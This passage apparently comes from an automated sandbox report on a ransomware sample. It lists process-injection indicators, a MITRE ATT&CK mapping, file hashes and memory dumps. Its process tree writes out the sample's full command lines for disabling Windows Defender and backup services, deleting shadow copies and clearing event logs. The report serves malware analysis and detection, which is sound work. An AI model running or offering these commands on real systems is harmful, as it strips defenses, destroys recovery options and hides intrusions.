Token: SeDebugPrivilege	2700	wmic.exe
Token: SeSystemEnvironmentPrivilege	2700	wmic.exe
Token: SeRemoteShutdownPrivilege	2700	wmic.exe
Token: SeUndockPrivilege	2700	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1012 wrote to memory of 4412	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	67
PID 1012 wrote to memory of 4412	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	67
PID 1012 wrote to memory of 4412	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	67
PID 4412 wrote to memory of 3968	4412	net.exe	69
PID 4412 wrote to memory of 3968	4412	net.exe	69
PID 4412 wrote to memory of 3968	4412	net.exe	69
PID 1012 wrote to memory of 5108	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	70
PID 1012 wrote to memory of 5108	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	70
PID 1012 wrote to memory of 5108	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	70
PID 5108 wrote to memory of 2580	5108	net.exe	72
PID 5108 wrote to memory of 2580	5108	net.exe	72
PID 5108 wrote to memory of 2580	5108	net.exe	72
PID 1012 wrote to memory of 4020	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	73
PID 1012 wrote to memory of 4020	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	73
PID 1012 wrote to memory of 4020	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	73
PID 4020 wrote to memory of 4400	4020	net.exe	75
PID 4020 wrote to memory of 4400	4020	net.exe	75
PID 4020 wrote to memory of 4400	4020	net.exe	75
PID 1012 wrote to memory of 4644	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	76
PID 1012 wrote to memory of 4644	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	76
PID 1012 wrote to memory of 4644	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	76
PID 4644 wrote to memory of 4744	4644	net.exe	78
PID 4644 wrote to memory of 4744	4644	net.exe	78
PID 4644 wrote to memory of 4744	4644	net.exe	78
PID 1012 wrote to memory of 4756	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	79
PID 1012 wrote to memory of 4756	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	79
PID 1012 wrote to memory of 4756	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	79
PID 4756 wrote to memory of 3612	4756	net.exe	81
PID 4756 wrote to memory of 3612	4756	net.exe	81
PID 4756 wrote to memory of 3612	4756	net.exe	81
PID 1012 wrote to memory of 3556	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	82
PID 1012 wrote to memory of 3556	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	82
PID 1012 wrote to memory of 3556	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	82
PID 3556 wrote to memory of 1972	3556	net.exe	84
PID 3556 wrote to memory of 1972	3556	net.exe	84
PID 3556 wrote to memory of 1972	3556	net.exe	84
PID 1012 wrote to memory of 2388	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	85
PID 1012 wrote to memory of 2388	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	85
PID 1012 wrote to memory of 2388	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	85
PID 2388 wrote to memory of 2176	2388	net.exe	87
PID 2388 wrote to memory of 2176	2388	net.exe	87
PID 2388 wrote to memory of 2176	2388	net.exe	87
PID 1012 wrote to memory of 1008	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	88
PID 1012 wrote to memory of 1008	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	88
PID 1012 wrote to memory of 1008	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	88
PID 1008 wrote to memory of 4040	1008	net.exe	90
PID 1008 wrote to memory of 4040	1008	net.exe	90
PID 1008 wrote to memory of 4040	1008	net.exe	90
PID 1012 wrote to memory of 1276	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	91
PID 1012 wrote to memory of 1276	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	91
PID 1012 wrote to memory of 1276	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	91
PID 1276 wrote to memory of 2700	1276	net.exe	93
PID 1276 wrote to memory of 2700	1276	net.exe	93
PID 1276 wrote to memory of 2700	1276	net.exe	93
PID 1012 wrote to memory of 4936	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	94
PID 1012 wrote to memory of 4936	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	94
PID 1012 wrote to memory of 4936	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	94
PID 1012 wrote to memory of 4864	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	96
PID 1012 wrote to memory of 4864	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	96
PID 1012 wrote to memory of 4864	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	96
PID 1012 wrote to memory of 4436	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	98
PID 1012 wrote to memory of 4436	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	98
PID 1012 wrote to memory of 4436	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	98
PID 1012 wrote to memory of 2604	1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	100

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
"C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1012
- C:\Windows\SysWOW64\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4412
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:3968
- C:\Windows\SysWOW64\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5108
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:2580
- C:\Windows\SysWOW64\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4020
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:4400
- C:\Windows\SysWOW64\net.exe
  net.exe stop "UI0Detect" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4644
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "UI0Detect" /y
    3⤵
    PID:4744
- C:\Windows\SysWOW64\net.exe
  net.exe stop "vmicvss" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4756
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "vmicvss" /y
    3⤵
    PID:3612
- C:\Windows\SysWOW64\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3556
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:1972
- C:\Windows\SysWOW64\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2388
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:2176
- C:\Windows\SysWOW64\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1008
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:4040
- C:\Windows\SysWOW64\net.exe
  net.exe stop "UnistoreSvc_178ae" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1276
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "UnistoreSvc_178ae" /y
    3⤵
    PID:2700
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  - Launches sc.exe
  PID:4936
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  - Launches sc.exe
  PID:4864
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  - Launches sc.exe
  PID:4436
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "UI0Detect" start= disabled
  2⤵
  - Launches sc.exe
  PID:2604
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "vmicvss" start= disabled
  2⤵
  - Launches sc.exe
  PID:2632
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  - Launches sc.exe
  PID:4532
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  - Launches sc.exe
  PID:4304
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  - Launches sc.exe
  PID:4364
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "UnistoreSvc_178ae" start= disabled
  2⤵
  - Launches sc.exe
  PID:3336
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:4788
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:4932
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1872
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:4276
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:3516
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:8
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:5080
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:436
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:664
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:4904
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:3524
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:600
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:1036
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:920
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:1664
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:1744
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:1732
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:1452
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:4344
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:212
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:2220
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:2120
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:2564
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:1080
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - Modifies registry class
  PID:2660
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - Modifies registry class
  PID:4100
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - Modifies registry class
  PID:2112
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:4956
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1728
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:3968
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2900
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:3948
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:3020
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:4720
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:4848
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:3692
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:3944
- C:\Windows\SysWOW64\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1252
- C:\Windows\SysWOW64\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2700
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:4684
- - C:\Program Files\Windows Defender\MpCmdRun.exe
    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    3⤵
    - Deletes Windows Defender Definitions
    PID:3504
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:4668
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3488
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:3688
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Impair Defenses

T1562

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
68324bd8e023f0b4ca77e2265963e6c8

SHA1
b94c28531178f0a5262946cfdd4fcb6f01378b58

SHA256
fef17810b8f507da8d6335e13f95c638ed4a7a844dc9d7c92efa994aa528ff8a

SHA512
d0d81b7714f1b0146a550626c83c422ab5fbc0f80e94825d46cb42f04c8b87adf639678d30b1ad5777c43bc0fe19d6e9e1b6e4d462c0aa58cdb9b66b6abdc6a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rxxmf5xq.uhp.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/1012-121-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/1012-3120-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/1012-7515-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/1012-7514-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/1012-5845-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/1012-4871-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/1012-4870-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/1012-235-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/1012-4498-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/1012-126-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/1012-2208-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/1012-1514-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/1012-728-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/1012-124-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/1012-122-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/1012-123-0x0000000000AA0000-0x0000000000DB2000-memory.dmp

Filesize
3.1MB

Download
memory/2804-386-0x0000000006FC0000-0x0000000006FD0000-memory.dmp

Filesize
64KB

Download
memory/2804-385-0x0000000006FC0000-0x0000000006FD0000-memory.dmp

Filesize
64KB

Download
memory/2804-403-0x000000007E8D0000-0x000000007E8E0000-memory.dmp

Filesize
64KB

Download
memory/2804-476-0x0000000006FC0000-0x0000000006FD0000-memory.dmp

Filesize
64KB

Download
memory/3488-135-0x0000000008340000-0x0000000008690000-memory.dmp

Filesize
3.3MB

Download
memory/3488-360-0x0000000009C60000-0x0000000009C7A000-memory.dmp

Filesize
104KB

Download
memory/3488-365-0x0000000009C50000-0x0000000009C58000-memory.dmp

Filesize
32KB

Download
memory/3488-166-0x0000000009CB0000-0x0000000009D44000-memory.dmp

Filesize
592KB

Download
memory/3488-165-0x0000000003760000-0x0000000003770000-memory.dmp

Filesize
64KB

Download
memory/3488-164-0x000000007FC00000-0x000000007FC10000-memory.dmp

Filesize
64KB

Download
memory/3488-163-0x0000000009B00000-0x0000000009BA5000-memory.dmp

Filesize
660KB

Download
memory/3488-158-0x0000000009790000-0x00000000097AE000-memory.dmp

Filesize
120KB

Download
memory/3488-157-0x00000000099D0000-0x0000000009A03000-memory.dmp

Filesize
204KB

Download
memory/3488-140-0x0000000008890000-0x0000000008906000-memory.dmp

Filesize
472KB

Download
memory/3488-139-0x0000000008B20000-0x0000000008B6B000-memory.dmp

Filesize
300KB

Download
memory/3488-138-0x00000000080D0000-0x00000000080EC000-memory.dmp

Filesize
112KB

Download
memory/3488-137-0x0000000003760000-0x0000000003770000-memory.dmp

Filesize
64KB

Download
memory/3488-136-0x0000000003760000-0x0000000003770000-memory.dmp

Filesize
64KB

Download
memory/3488-134-0x0000000007960000-0x00000000079C6000-memory.dmp

Filesize
408KB

Download
memory/3488-133-0x00000000078F0000-0x0000000007956000-memory.dmp

Filesize
408KB

Download
memory/3488-132-0x0000000007750000-0x0000000007772000-memory.dmp

Filesize
136KB

Download
memory/3488-131-0x00000000079E0000-0x0000000008008000-memory.dmp

Filesize
6.2MB

Download
memory/3488-130-0x00000000037C0000-0x00000000037F6000-memory.dmp

Filesize
216KB

Download